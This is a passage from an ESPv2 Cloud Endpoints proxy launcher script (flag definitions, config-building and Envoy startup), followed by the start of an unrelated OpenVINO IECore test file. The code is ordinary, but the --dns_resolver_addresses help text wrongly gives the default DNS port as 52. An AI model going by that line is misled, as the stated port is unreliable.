Comma separated outgoing trace contexts (traceparent|grpc-trace-bin|x-cloud-trace-context).
Note the order matters. Default is 'traceparent,x-cloud-trace-context'.
See official documentation for more details:
https://cloud.google.com/endpoints/docs/openapi/tracing'''
)
parser.add_argument(
'--cloud_trace_url_override',
default="",
help='''
By default, traces will be sent to production Stackdriver Tracing.
If this is non-empty, ESPv2 will send traces to this gRPC service instead.
The url must be in gRPC format.
https://github.com/grpc/grpc/blob/master/doc/naming.md
The gRPC service must implement the cloud trace v2 RPCs.
https://github.com/googleapis/googleapis/tree/master/google/devtools/cloudtrace/v2
'''
)
parser.add_argument(
'--non_gcp',
action='store_true',
default=False,
help='''
By default, the proxy tries to talk to GCP metadata server to get VM
location in the first few requests. Setting this flag to true to skip
this step.
This will also disable the following features:
- Backend authentication
''')
parser.add_argument(
'--service_account_key',
help='''
Use the service account key JSON file to access the service control and the
service management. You can also set {creds_key} environment variable to
the location of the service account credentials JSON file. If the option is
omitted, the proxy contacts the metadata service to fetch an access token.
'''.format(creds_key=GOOGLE_CREDS_KEY))
parser.add_argument(
'--dns_resolver_addresses',
help='''
The addresses of dns resolvers. Each address should be in format of
IP_ADDR or IP_ADDR:PORT and they are separated by ';'. For the IP_ADDR
case, the default DNS port 52 will be used. (e.g.,
--dns_resolver_addresses=127.0.0.1;127.0.0.2;127.0.0.3:8000)
If unset, will use the default resolver configured in /etc/resolv.conf.
''')
parser.add_argument(
'--backend_dns_lookup_family',
default=None,
choices=['auto', 'v4only', 'v6only'],
help='''
Define the dns lookup family for all backends. The options are "auto", "v4only" and "v6only". The default is "auto".
''')
parser.add_argument('--enable_debug', action='store_true', default=False,
help='''
Enables a variety of debug features in both Config Manager and Envoy, such as:
- Debug level per-request application logs in Envoy
- Debug level service configuration logs in Config Manager
- Debug HTTP response headers
''')
parser.add_argument(
'--transcoding_always_print_primitive_fields',
action='store_true', help='''Whether to always print primitive fields
for grpc-json transcoding. By default primitive fields with default
values will be omitted in JSON output. For example, an int32 field set
to 0 will be omitted. Setting this flag to true will override the
default behavior and print primitive fields regardless of their values.
Defaults to false
''')
parser.add_argument(
'--transcoding_always_print_enums_as_ints', action='store_true',
help='''Whether to always print enums as ints for grpc-json transcoding.
By default they are rendered as strings. Defaults to false.''')
parser.add_argument(
'--transcoding_preserve_proto_field_names', action='store_true',
help='''Whether to preserve proto field names for grpc-json transcoding.
By default protobuf will generate JSON field names using the json_name
option, or lower camel case, in that order. Setting this flag will
preserve the original field names. Defaults to false''')
parser.add_argument(
'--transcoding_ignore_query_parameters', action=None,
help='''
A list of query parameters(separated by comma) to be ignored for
transcoding method mapping in grpc-json transcoding. By default, the
transcoder filter will not transcode a request if there are any
unknown/invalid query parameters.
''')
parser.add_argument(
'--transcoding_ignore_unknown_query_parameters', action='store_true',
help='''
Whether to ignore query parameters that cannot be mapped to a
corresponding protobuf field in grpc-json transcoding. Use this if you
cannot control the query parameters and do not know them beforehand.
Otherwise use ignored_query_parameters. Defaults to false.
''')
# Start Deprecated Flags Section
parser.add_argument(
'--enable_backend_routing',
action='store_true',
default=False,
help='''
===
DEPRECATED: This flag will automatically be enabled if needed, so it
does NOT need to be set manually.
===
Enable ESPv2 to route requests according to the
"x-google-backend" or "backend" configuration
''')
parser.add_argument(
'--backend_protocol',
default=None,
help='''
===
DEPRECATED: This flag will automatically be set based on the scheme
specified in the --backend flag. Overrides are no longer needed.
===
Backend Protocol. Overrides the protocol in --backend.
Choices: [http1|http2|grpc].
Default value: http1.''',
choices=['http1', 'http2', 'grpc'])
parser.add_argument('--http_port', default=None, type=int, help='''
This flag is exactly same as --listener_port. It is added for
backward compatible for ESPv1 and will be deprecated.
Please use the flag --listener_port.''')
parser.add_argument('--http2_port', default=None, type=int, help='''
This flag is exactly same as --listener_port. It is added for
backward compatible for ESPv1 and will be deprecated.
Please use the flag --listener_port.''')
parser.add_argument('--ssl_port', default=None, type=int, help='''
This flag added for backward compatible for ESPv1 and will be deprecated.
Please use the flags --listener_port and --ssl_server_cert_path instead.
When configured, ESPv2 accepts HTTP/1.x and HTTP/2 secure connections on this port,
Requires the certificate and key files /etc/nginx/ssl/nginx.crt and
/etc/nginx/ssl/nginx.key''')
parser.add_argument('--dns', help='''
This flag is exactly same as --dns_resolver_addresses. This flag is added
for backward compatible for ESPv1 and will be deprecated.
Please use the flag --dns_resolver_addresses instead.''')
parser.add_argument('-t', '--tls_mutual_auth', action='store_true', help='''
This flag added for backward compatible for ESPv1 and will be deprecated.
Please use the flag --ssl_backend_client_cert_path instead.
Enable TLS mutual authentication for HTTPS backends.
Default value: Not enabled. Please provide the certificate and key files
/etc/nginx/ssl/backend.crt and /etc/nginx/ssl/backend.key.''')
parser.add_argument('--ssl_protocols',
default=None, action='append', help='''
This flag added for backward compatible for ESPv1 and will be deprecated.
Please use the flag --ssl_minimum_protocol and --ssl_maximum_protocol
instead.
Enable the specified SSL protocols. Please refer to
https://nginx.org/en/docs/http/ngx_http_ssl_module.html#ssl_protocols.
The "ssl_protocols" argument can be repeated multiple times to specify multiple
SSL protocols (e.g., --ssl_protocols=TLSv1.1 --ssl_protocols=TLSv1.2).
''')
parser.add_argument('--enable_grpc_backend_ssl',
action='store_true', help='''
This flag added for backward compatible for ESPv1 and will be deprecated.
Enable SSL for gRPC backend. ESPv2 auto enables SSL if schema `grpcs` is
detected.''')
parser.add_argument('--grpc_backend_ssl_root_certs_file',
default='/etc/nginx/trusted-ca-certificates.crt',
help='''This flag added for backward compatible for ESPv1 and will be deprecated.
ESPv2 uses `/etc/ssl/certs/ca-certificates.crt` by default.
The file path for gRPC backend SSL root certificates.''')
parser.add_argument('--ssl_client_cert_path', default=None, help='''
This flag is renamed and deprecated for clarity.
Use `--ssl_backend_client_cert_path` instead.''')
parser.add_argument('--ssl_client_root_certs_file', default=None, help='''
This flag is renamed and deprecated for clarity.
Use `--ssl_backend_client_root_certs_file` instead.''')
# End Deprecated Flags Section
# Start internal flags section
parser.add_argument(
'--on_serverless',
action='store_true',
default=False,
help='''
When ESPv2 is started via the serverless image, this is true.
''')
# End internal flags section
return parser
# Check whether there are conflict flags. If so, return the error string.
# Otherwise returns None. This function also changes some default flag value.
def enforce_conflict_args(args):
if args.rollout_strategy:
if args.rollout_strategy != DEFAULT_ROLLOUT_STRATEGY:
if args.version:
return "Flag --version cannot be used together with -R or --rollout_strategy."
if args.service_json_path:
return "Flag -R or --rollout_strategy must be fixed with --service_json_path."
if args.service_json_path:
if args.service:
return "Flag --service cannot be used together with --service_json_path."
if args.version:
return "Flag --version cannot be used together with --service_json_path."
if args.non_gcp:
if args.service_account_key is None and GOOGLE_CREDS_KEY not in os.environ:
return "If --non_gcp is specified, --service_account_key has to be specified, or GOOGLE_APPLICATION_CREDENTIALS has to set in os.environ."
if not args.tracing_project_id:
# for non gcp case, disable tracing if tracing project id is not provided.
args.disable_tracing = True
if not args.access_log and args.access_log_format:
return "Flag --access_log_format has to be used together with --access_log."
if args.ssl_port and args.ssl_server_cert_path:
return "Flag --ssl_port is going to be deprecated, please use --ssl_server_cert_path only."
if args.tls_mutual_auth and (args.ssl_backend_client_cert_path or args.ssl_client_cert_path):
return "Flag --tls_mutual_auth is going to be deprecated, please use --ssl_backend_client_cert_path only."
if (args.ssl_backend_client_root_certs_file or args.ssl_client_root_certs_file) and args.enable_grpc_backend_ssl:
return "Flag --enable_grpc_backend_ssl are going to be deprecated, please use --ssl_backend_client_root_certs_file only."
if args.generate_self_signed_cert and args.ssl_server_cert_path:
return "Flag --generate_self_signed_cert and --ssl_server_cert_path cannot be used simutaneously."
port_flags = []
port_num = DEFAULT_LISTENER_PORT
if args.http_port:
port_flags.append("--http_port")
port_num = args.http_port
if args.http2_port:
port_flags.append("--http2_port")
port_num = args.http2_port
if args.listener_port:
port_flags.append("--listener_port")
port_num = args.listener_port
if args.ssl_port:
port_flags.append("--ssl_port")
port_num = args.ssl_port
if len(port_flags) > 1:
return "Multiple port flags {} are not allowed, use only the --listener_port flag".format(",".join(port_flags))
elif port_num < 1024:
return "Port {} is a privileged port. " \
"For security purposes, the ESPv2 container cannot bind to it. " \
"Use any port above 1024 instead.".format(port_num)
if args.ssl_protocols and (args.ssl_minimum_protocol or args.ssl_maximum_protocol):
return "Flag --ssl_protocols is going to be deprecated, please use --ssl_minimum_protocol and --ssl_maximum_protocol."
if args.transcoding_ignore_query_parameters \
and args.transcoding_ignore_unknown_query_parameters:
return "Flag --transcoding_ignore_query_parameters cannot be used" \
" together with --transcoding_ignore_unknown_query_parameters."
if args.dns_resolver_addresses and args.dns:
return "Flag --dns_resolver_addresses cannot be used together with" \
" together with --dns."
if args.ssl_backend_client_cert_path and args.ssl_client_cert_path:
return "Flag --ssl_client_cert_path is renamed to " \
"--ssl_backend_client_cert_path, only use the latter flag."
if args.ssl_backend_client_root_certs_file and args.ssl_client_root_certs_file:
return "Flag --ssl_client_root_certs_file is renamed to " \
"--ssl_backend_client_root_certs_file, only use the latter flag."
return None
def gen_proxy_config(args):
check_conflict_result = enforce_conflict_args(args)
if check_conflict_result:
logging.error(check_conflict_result)
sys.exit(1)
proxy_conf = [
CONFIGMANAGER_BIN,
"--logtostderr",
"--rollout_strategy", args.rollout_strategy,
]
if "://" not in args.backend:
proxy_conf.extend(["--backend_address", "http://" + args.backend])
else:
proxy_conf.extend(["--backend_address", args.backend])
if args.healthz:
proxy_conf.extend(["--healthz", args.healthz])
if args.enable_debug:
proxy_conf.extend(["--v", "1"])
else:
proxy_conf.extend(["--v", "0"])
if args.envoy_xff_num_trusted_hops:
proxy_conf.extend(["--envoy_xff_num_trusted_hops",
args.envoy_xff_num_trusted_hops])
elif args.on_serverless:
proxy_conf.extend(["--envoy_xff_num_trusted_hops",
'{}'.format(SERVERLESS_XFF_NUM_TRUSTED_HOPS)])
if args.disable_jwks_async_fetch:
proxy_conf.append("--disable_jwks_async_fetch")
if args.jwks_cache_duration_in_s:
proxy_conf.extend(["--jwks_cache_duration_in_s", args.jwks_cache_duration_in_s])
if args.jwks_fetch_num_retries:
proxy_conf.extend(["--jwks_fetch_num_retries", args.jwks_fetch_num_retries])
if args.jwks_fetch_retry_back_off_base_interval_ms:
proxy_conf.extend(["--jwks_fetch_retry_back_off_base_interval_ms", args.jwks_fetch_retry_back_off_base_interval_ms])
if args.jwks_fetch_retry_back_off_max_interval_ms:
proxy_conf.extend(["--jwks_fetch_retry_back_off_max_interval_ms", args.jwks_fetch_retry_back_off_max_interval_ms])
if args.management:
proxy_conf.extend(["--service_management_url", args.management])
if args.log_request_headers:
proxy_conf.extend(["--log_request_headers", args.log_request_headers])
if args.log_response_headers:
proxy_conf.extend(["--log_response_headers", args.log_response_headers])
if args.log_jwt_payloads:
proxy_conf.extend(["--log_jwt_payloads", args.log_jwt_payloads])
if args.http_port:
proxy_conf.extend(["--listener_port", str(args.http_port)])
if args.http2_port:
proxy_conf.extend(["--listener_port", str(args.http2_port)])
if args.listener_port:
proxy_conf.extend(["--listener_port", str(args.listener_port)])
if args.ssl_server_cert_path:
proxy_conf.extend(["--ssl_server_cert_path", str(args.ssl_server_cert_path)])
if args.ssl_server_root_cert_path:
proxy_conf.extend(["--ssl_server_root_cert_path", str(args.ssl_server_root_cert_path)])
if args.ssl_port:
proxy_conf.extend(["--ssl_server_cert_path", "/etc/nginx/ssl"])
proxy_conf.extend(["--listener_port", str(args.ssl_port)])
if args.ssl_backend_client_cert_path:
proxy_conf.extend(["--ssl_backend_client_cert_path", str(args.ssl_backend_client_cert_path)])
if args.ssl_client_cert_path:
proxy_conf.extend(["--ssl_backend_client_cert_path", str(args.ssl_client_cert_path)])
if args.enable_grpc_backend_ssl and args.grpc_backend_ssl_root_certs_file:
proxy_conf.extend(["--ssl_backend_client_root_certs_path", str(args.grpc_backend_ssl_root_certs_file)])
if args.ssl_backend_client_root_certs_file:
proxy_conf.extend(["--ssl_backend_client_root_certs_path", str(args.ssl_backend_client_root_certs_file)])
if args.ssl_client_root_certs_file:
proxy_conf.extend(["--ssl_backend_client_root_certs_path", str(args.ssl_client_root_certs_file)])
if args.ssl_server_cipher_suites:
proxy_conf.extend(["--ssl_server_cipher_suites", str(args.ssl_server_cipher_suites)])
if args.ssl_backend_client_cipher_suites:
proxy_conf.extend(["--ssl_backend_client_cipher_suites", str(args.ssl_backend_client_cipher_suites)])
if args.tls_mutual_auth:
proxy_conf.extend(["--ssl_backend_client_cert_path", "/etc/nginx/ssl"])
if args.ssl_minimum_protocol:
proxy_conf.extend(["--ssl_minimum_protocol", args.ssl_minimum_protocol])
if args.ssl_maximum_protocol:
proxy_conf.extend(["--ssl_maximum_protocol", args.ssl_maximum_protocol])
if args.ssl_protocols:
args.ssl_protocols.sort()
proxy_conf.extend(["--ssl_minimum_protocol", args.ssl_protocols[0]])
proxy_conf.extend(["--ssl_maximum_protocol", args.ssl_protocols[-1]])
if args.add_request_header:
proxy_conf.extend(["--add_request_headers", ";".join(args.add_request_header)])
if args.append_request_header:
proxy_conf.extend(["--append_request_headers", ";".join(args.append_request_header)])
if args.add_response_header:
proxy_conf.extend(["--add_response_headers", ";".join(args.add_response_header)])
if args.append_response_header:
proxy_conf.extend(["--append_response_headers", ";".join(args.append_response_header)])
if args.enable_operation_name_header:
proxy_conf.append("--enable_operation_name_header")
# Generate self-signed cert if needed
if args.generate_self_signed_cert:
if not os.path.exists("/tmp/ssl/endpoints"):
os.makedirs("/tmp/ssl/endpoints")
logging.info("Generating self-signed certificate...")
os.system(("openssl req -x509 -newkey rsa:2048"
" -keyout /tmp/ssl/endpoints/server.key -nodes"
" -out /tmp/ssl/endpoints/server.crt"
' -days 3650 -subj "/CN=localhost"'))
proxy_conf.extend(["--ssl_server_cert_path", "/tmp/ssl/endpoints"])
if args.enable_strict_transport_security:
proxy_conf.append("--enable_strict_transport_security")
if args.service:
proxy_conf.extend(["--service", args.service])
if args.http_request_timeout_s:
proxy_conf.extend( ["--http_request_timeout_s", str(args.http_request_timeout_s)])
if args.service_control_check_retries:
proxy_conf.extend([
"--service_control_check_retries",
args.service_control_check_retries
])
if args.service_control_quota_retries:
proxy_conf.extend([
"--service_control_quota_retries",
args.service_control_quota_retries
])
if args.service_control_report_retries:
proxy_conf.extend([
"--service_control_report_retries",
args.service_control_report_retries
])
if args.service_control_check_timeout_ms:
proxy_conf.extend([
"--service_control_check_timeout_ms",
args.service_control_check_timeout_ms
])
if args.service_control_quota_timeout_ms:
proxy_conf.extend([
"--service_control_quota_timeout_ms",
args.service_control_quota_timeout_ms
])
if args.service_control_report_timeout_ms:
proxy_conf.extend([
"--service_control_report_timeout_ms",
args.service_control_report_timeout_ms
])
# NOTE: It is true by default in configmangager's flags.
if args.service_control_network_fail_policy == "close":
proxy_conf.extend(["--service_control_network_fail_open=false"])
if args.version:
proxy_conf.extend(["--service_config_id", args.version])
if args.service_json_path:
proxy_conf.extend(["--service_json_path", args.service_json_path])
if args.check_metadata:
proxy_conf.append("--check_metadata")
if args.underscores_in_headers:
proxy_conf.append("--underscores_in_headers")
if args.disable_normalize_path:
proxy_conf.append("--normalize_path=false")
if args.disable_merge_slashes_in_path:
proxy_conf.append("--merge_slashes_in_path=false")
if args.disallow_escaped_slashes_in_path:
proxy_conf.append("--disallow_escaped_slashes_in_path")
if args.backend_retry_ons:
proxy_conf.extend(["--backend_retry_ons", args.backend_retry_ons])
if args.backend_retry_on_status_codes:
proxy_conf.extend(["--backend_retry_on_status_codes", args.backend_retry_on_status_codes])
if args.backend_retry_num:
proxy_conf.extend(["--backend_retry_num", args.backend_retry_num])
if args.backend_per_try_timeout:
proxy_conf.extend(["--backend_per_try_timeout", args.backend_per_try_timeout])
if args.access_log:
proxy_conf.extend(["--access_log",
args.access_log])
if args.access_log_format:
proxy_conf.extend(["--access_log_format",
args.access_log_format])
if args.disable_tracing:
proxy_conf.append("--disable_tracing")
else:
if args.tracing_project_id:
proxy_conf.extend(["--tracing_project_id", args.tracing_project_id])
if args.tracing_incoming_context:
proxy_conf.extend(
["--tracing_incoming_context", args.tracing_incoming_context])
if args.tracing_outgoing_context:
proxy_conf.extend(
["--tracing_outgoing_context", args.tracing_outgoing_context])
if args.cloud_trace_url_override:
proxy_conf.extend(["--tracing_stackdriver_address",
args.cloud_trace_url_override])
if args.disable_cloud_trace_auto_sampling:
proxy_conf.extend(["--tracing_sample_rate", "0"])
elif args.tracing_sample_rate:
proxy_conf.extend(["--tracing_sample_rate",
str(args.tracing_sample_rate)])
if args.transcoding_always_print_primitive_fields:
proxy_conf.append("--transcoding_always_print_primitive_fields")
if args.transcoding_always_print_enums_as_ints:
proxy_conf.append("--transcoding_always_print_enums_as_ints")
if args.transcoding_preserve_proto_field_names:
proxy_conf.append("--transcoding_preserve_proto_field_names")
if args.transcoding_ignore_query_parameters:
proxy_conf.extend(["--transcoding_ignore_query_parameters",
args.transcoding_ignore_query_parameters])
if args.transcoding_ignore_unknown_query_parameters:
proxy_conf.append("--transcoding_ignore_unknown_query_parameters")
if args.on_serverless:
proxy_conf.extend([
"--compute_platform_override", SERVERLESS_PLATFORM])
if args.backend_dns_lookup_family:
proxy_conf.extend(
["--backend_dns_lookup_family", args.backend_dns_lookup_family])
if args.dns_resolver_addresses:
proxy_conf.extend(
["--dns_resolver_addresses", args.dns_resolver_addresses])
if args.dns:
proxy_conf.extend(
["--dns_resolver_addresses", args.dns]
)
if args.envoy_use_remote_address:
proxy_conf.append("--envoy_use_remote_address")
if args.cors_preset:
proxy_conf.extend([
"--cors_preset",
args.cors_preset,
"--cors_allow_origin",
args.cors_allow_origin,
"--cors_allow_origin_regex",
args.cors_allow_origin_regex,
"--cors_allow_methods",
args.cors_allow_methods,
"--cors_allow_headers",
args.cors_allow_headers,
"--cors_expose_headers",
args.cors_expose_headers,
"--cors_max_age",
args.cors_max_age,
])
if args.cors_allow_credentials:
proxy_conf.append("--cors_allow_credentials")
# Set credentials file from the environment variable
if args.service_account_key is None and GOOGLE_CREDS_KEY in os.environ:
args.service_account_key = os.environ[GOOGLE_CREDS_KEY]
if args.service_account_key:
proxy_conf.extend(["--service_account_key", args.service_account_key])
if args.non_gcp:
proxy_conf.append("--non_gcp")
if args.enable_debug:
proxy_conf.append("--suppress_envoy_headers=false")
if args.envoy_connection_buffer_limit_bytes:
proxy_conf.extend(["--connection_buffer_limit_bytes",
args.envoy_connection_buffer_limit_bytes])
if args.enable_backend_address_override:
proxy_conf.append("--enable_backend_address_override")
return proxy_conf
def gen_envoy_args(args):
cmd = [ENVOY_BIN, "-c", DEFAULT_CONFIG_DIR + BOOTSTRAP_CONFIG,
"--disable-hot-restart",
# This will print logs in `glog` format.
# Stackdriver logging integrates nicely with this format.
"--log-format %L%m%d %T.%e %t envoy] [%t][%n]%v",
"--log-format-escaped"]
if args.enable_debug:
# Enable debug logging, but not for everything... too noisy otherwise.
cmd.append("-l debug")
cmd.append("--component-log-level upstream:info,main:info")
return cmd
def output_reader(proc):
for line in iter(proc.stdout.readline, b''):
sys.stdout.write(line.decode())
def start_config_manager(proxy_conf):
print("Starting Config Manager with args: {}".format(proxy_conf))
proc = subprocess.Popen(proxy_conf,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
t = threading.Thread(target=output_reader, args=(proc,))
t.start()
return proc
def start_envoy(args):
subprocess.call(gen_bootstrap_conf(args))
cmd = gen_envoy_args(args)
print("Starting Envoy with args: {}".format(cmd))
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
t = threading.Thread(target=output_reader, args=(proc,))
t.start()
return proc
if __name__ == '__main__':
logging.basicConfig(format='%(levelname)s: %(message)s', level=logging.INFO)
parser = make_argparser()
args = parser.parse_args()
cm_proc = start_config_manager(gen_proxy_config(args))
envoy_proc = start_envoy(args)
while True:
time.sleep(HEALTH_CHECK_PERIOD)
if not cm_proc or cm_proc.poll():
logging.fatal("Config Manager is down, killing all processes.")
if envoy_proc:
os.kill(envoy_proc.pid, signal.SIGKILL)
sys.exit(1)
if not envoy_proc or envoy_proc.poll():
logging.fatal("Envoy is down, killing all processes.")
if cm_proc:
os.kill(cm_proc.pid, signal.SIGKILL)
sys.exit(1)
|
test_IECore.py | # Copyright (C) 2018-2022 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import os
import pytest
import sys
from sys import platform
from pathlib import Path
from threading import Event, Thread
from time import sleep, time
from queue import Queue
from openvino.inference_engine import IENetwork, IECore, ExecutableNetwork
from tests_compatibility.conftest import model_path, plugins_path, model_onnx_path
import ngraph as ng
test_net_xml, test_net_bin = model_path()
test_net_onnx = model_onnx_path()
plugins_xml, plugins_win_xml, plugins_osx_xml = plugins_path()
def test_init_ie_core_no_cfg():
ie = IECore()
assert isinstance(ie, IECore)
def test_init_ie_core_with_cfg():
ie = IECore(plugins_xml)
assert isinstance(ie, IECore)
def test_get_version(device):
ie = IECore()
version = ie.get_versions(device)
assert isinstance(version, dict), "Returned version must be a dictionary"
assert device in version, "{} plugin version wasn't found in versions"
assert hasattr(version[device], "major"), "Returned version has no field 'major'"
assert hasattr(version[device], "minor"), "Returned version has no field 'minor'"
assert hasattr(version[device], "description"), "Returned version has no field 'description'"
assert hasattr(version[device], "build_number"), "Returned version has no field 'build_number'"
def test_load_network(device):
ie = IECore()
net = ie.read_network(model=test_net_xml, weights=test_net_bin)
exec_net = ie.load_network(net, device)
assert isinstance(exec_net, ExecutableNetwork)
def test_load_network_without_device():
ie = IECore()
net = ie.read_network(model=test_net_xml, weights=test_net_bin)
exec_net = ie.load_network(net)
assert isinstance(exec_net, ExecutableNetwork)
def test_load_network_from_file(device):
ie = IECore()
exec_net = ie.load_network(test_net_xml, device)
assert isinstance(exec_net, ExecutableNetwork)
def test_load_network_from_file_without_device():
ie = IECore()
exec_net = ie.load_network(test_net_xml)
assert isinstance(exec_net, ExecutableNetwork)
@pytest.mark.skipif(os.environ.get("TEST_DEVICE", "CPU") != "CPU", reason="Device independent test")
def test_load_network_wrong_device():
ie = IECore()
net = ie.read_network(model=test_net_xml, weights=test_net_bin)
with pytest.raises(RuntimeError) as e:
ie.load_network(net, "BLA")
assert 'Device with "BLA" name is not registered in the InferenceEngine' in str(e.value)
def test_query_network(device):
ie = IECore()
net = ie.read_network(model=test_net_xml, weights=test_net_bin)
query_res = ie.query_network(net, device)
func_net = ng.function_from_cnn(net)
ops_net = func_net.get_ordered_ops()
ops_net_names = [op.friendly_name for op in ops_net]
assert [key for key in query_res.keys() if key not in ops_net_names] == [], \
"Not all network layers present in query_network results"
assert next(iter(set(query_res.values()))) == device, "Wrong device for some layers"
@pytest.mark.dynamic_library
@pytest.mark.skipif(os.environ.get("TEST_DEVICE", "CPU") != "CPU", reason="Device dependent test")
def test_register_plugin():
ie = IECore()
if ie.get_metric("CPU", "FULL_DEVICE_NAME") == "arm_compute::NEON":
pytest.skip("Can't run on ARM plugin due-to ov_intel_cpu_plugin specific test")
ie.register_plugin("ov_intel_cpu_plugin", "BLA")
net = ie.read_network(model=test_net_xml, weights=test_net_bin)
exec_net = ie.load_network(net, "BLA")
assert isinstance(exec_net, ExecutableNetwork), "Cannot load the network to the registered plugin with name 'BLA'"
@pytest.mark.dynamic_library
@pytest.mark.skipif(os.environ.get("TEST_DEVICE", "CPU") != "CPU", reason="Device dependent test")
def test_register_plugins():
ie = IECore()
if ie.get_metric("CPU", "FULL_DEVICE_NAME") == "arm_compute::NEON":
pytest.skip("Can't run on ARM plugin due-to ov_intel_cpu_plugin specific test")
if platform == "linux" or platform == "linux2":
ie.register_plugins(plugins_xml)
elif platform == "darwin":
ie.register_plugins(plugins_osx_xml)
elif platform == "win32":
ie.register_plugins(plugins_win_xml)
net = ie.read_network(model=test_net_xml, weights=test_net_bin)
exec_net = ie.load_network(net, "CUSTOM")
assert isinstance(exec_net,
ExecutableNetwork), "Cannot load the network to the registered plugin with name 'CUSTOM' " \
"registred in the XML file"
@pytest.mark.skip(reason="Need to figure out if it's expected behaviour (fails with C++ API as well")
def test_unregister_plugin(device):
ie = IECore()
ie.unregister_plugin(device)
net = ie.read_network(model=test_net_xml, weights=test_net_bin)
with pytest.raises(RuntimeError) as e:
ie.load_network(net, device)
assert f"Device with '{device}' name is not registered in the InferenceEngine" in str(e.value)
def test_available_devices(device):
ie = IECore()
devices = ie.available_devices
assert device in devices, f"Current device '{device}' is not listed in available devices '{', '.join(devices)}'"
@pytest.mark.skipif(os.environ.get("TEST_DEVICE", "CPU") != "CPU",
reason=f"Cannot run test on device {os.environ.get('TEST_DEVICE')}, Plugin specific test")
def test_get_metric_list_of_str():
ie = IECore()
param = ie.get_metric("CPU", "OPTIMIZATION_CAPABILITIES")
assert isinstance(param, list), "Parameter value for 'OPTIMIZATION_CAPABILITIES' " \
f"metric must be a list but {type(param)} is returned"
assert all(isinstance(v, str) for v in param), "Not all of the parameter values for 'OPTIMIZATION_CAPABILITIES' " \
"metric are strings!"
@pytest.mark.skipif(os.environ.get("TEST_DEVICE", "CPU") != "CPU",
reason=f"Cannot run test on device {os.environ.get('TEST_DEVICE')}, Plugin specific test")
def test_get_metric_tuple_of_two_ints():
ie = IECore()
if ie.get_metric("CPU", "FULL_DEVICE_NAME") == "arm_compute::NEON":
pytest.skip("Can't run on ARM plugin due-to unsupported device metric")
param = ie.get_metric("CPU", "RANGE_FOR_STREAMS")
assert isinstance(param, tuple), "Parameter value for 'RANGE_FOR_STREAMS' " \
f"metric must be tuple but {type(param)} is returned"
assert all(isinstance(v, int) for v in param), "Not all of the parameter values for 'RANGE_FOR_STREAMS' " \
"metric are integers!"
@pytest.mark.skipif(os.environ.get("TEST_DEVICE", "CPU") != "CPU",
reason=f"Cannot run test on device {os.environ.get('TEST_DEVICE')}, Plugin specific test")
def test_get_metric_tuple_of_three_ints():
ie = IECore()
if ie.get_metric("CPU", "FULL_DEVICE_NAME") == "arm_compute::NEON":
pytest.skip("Can't run on ARM plugin due-to unsupported device metric")
param = ie.get_metric("CPU", "RANGE_FOR_ASYNC_INFER_REQUESTS")
assert isinstance(param, tuple), "Parameter value for 'RANGE_FOR_ASYNC_INFER_REQUESTS' " \
f"metric must be tuple but {type(param)} is returned"
assert all(isinstance(v, int) for v in param), "Not all of the parameter values for " \
"'RANGE_FOR_ASYNC_INFER_REQUESTS' metric are integers!"
@pytest.mark.skipif(os.environ.get("TEST_DEVICE", "CPU") != "CPU",
reason=f"Cannot run test on device {os.environ.get('TEST_DEVICE')}, Plugin specific test")
def test_get_metric_str():
ie = IECore()
param = ie.get_metric("CPU", "FULL_DEVICE_NAME")
assert isinstance(param, str), "Parameter value for 'FULL_DEVICE_NAME' " \
f"metric must be string but {type(param)} is returned"
def test_read_network_from_xml():
ie = IECore()
net = ie.read_network(model=test_net_xml, weights=test_net_bin)
assert isinstance(net, IENetwork)
net = ie.read_network(model=test_net_xml)
assert isinstance(net, IENetwork)
def test_read_network_as_path():
ie = IECore()
net = ie.read_network(model=Path(test_net_xml), weights=test_net_bin)
assert isinstance(net, IENetwork)
net = ie.read_network(model=test_net_xml, weights=Path(test_net_bin))
assert isinstance(net, IENetwork)
net = ie.read_network(model=Path(test_net_xml))
assert isinstance(net, IENetwork)
def test_read_network_from_onnx():
ie = IECore()
net = ie.read_network(model=test_net_onnx)
assert isinstance(net, IENetwork)
def test_read_network_from_onnx_as_path():
ie = IECore()
net = ie.read_network(model=Path(test_net_onnx))
assert isinstance(net, IENetwork)
def test_incorrect_xml():
ie = IECore()
with pytest.raises(Exception) as e:
ie.read_network(model="./model.xml", weights=Path(test_net_bin))
assert "Path to the model ./model.xml doesn't exist or it's a directory" in str(e.value)
def test_incorrect_bin():
ie = IECore()
with pytest.raises(Exception) as e:
ie.read_network(model=test_net_xml, weights="./model.bin")
assert "Path to the weights ./model.bin doesn't exist or it's a directory" in str(e.value)
def test_read_net_from_buffer():
ie = IECore()
with open(test_net_bin, 'rb') as f:
bin = f.read()
with open(model_path()[0], 'rb') as f:
xml = f.read()
net = ie.read_network(model=xml, weights=bin, init_from_buffer=True)
assert isinstance(net, IENetwork)
def test_net_from_buffer_valid():
ie = IECore()
with open(test_net_bin, 'rb') as f:
bin = f.read()
with open(model_path()[0], 'rb') as f:
xml = f.read()
net = ie.read_network(model=xml, weights=bin, init_from_buffer=True)
ref_net = ie.read_network(model=test_net_xml, weights=test_net_bin)
assert net.name == ref_net.name
assert net.batch_size == ref_net.batch_size
ii_net = net.input_info
ii_net2 = ref_net.input_info
o_net = net.outputs
o_net2 = ref_net.outputs
assert ii_net.keys() == ii_net2.keys()
assert o_net.keys() == o_net2.keys()
@pytest.mark.skipif(os.environ.get("TEST_DEVICE","CPU") != "GPU", reason=f"Device dependent test")
def test_load_network_release_gil(device):
running = True
message_queue = Queue()
def detect_long_gil_holds():
sleep_time = 0.01
latency_alert_threshold = 0.1
# Send a message to indicate the thread is running and ready to detect GIL locks
message_queue.put("ready to detect")
while running:
start_sleep = time()
sleep(sleep_time)
elapsed = time() - start_sleep
if elapsed > latency_alert_threshold:
# Send a message to the testing thread that a long GIL lock occurred
message_queue.put(latency_alert_threshold)
ie = IECore()
net = ie.read_network(model=test_net_xml, weights=test_net_bin)
# Wait for the GIL lock detector to be up and running
gil_hold_detection_thread = Thread(daemon=True, target=detect_long_gil_holds)
gil_hold_detection_thread.start()
# Wait to make sure the thread is started and checking for GIL holds
sleep(0.1)
assert message_queue.get(timeout=5) == "ready to detect"
# Run the function that should unlock the GIL
exec_net = ie.load_network(net, device)
# Ensure resources are closed
running = False
gil_hold_detection_thread.join(timeout=5)
# Assert there were never any long gil locks
assert message_queue.qsize() == 0, \
f"More than 0 GIL locks occured! Latency: {message_queue.get()})"
def test_nogil_safe(device):
call_thread_func = Event()
switch_interval = sys.getswitchinterval()
core = IECore()
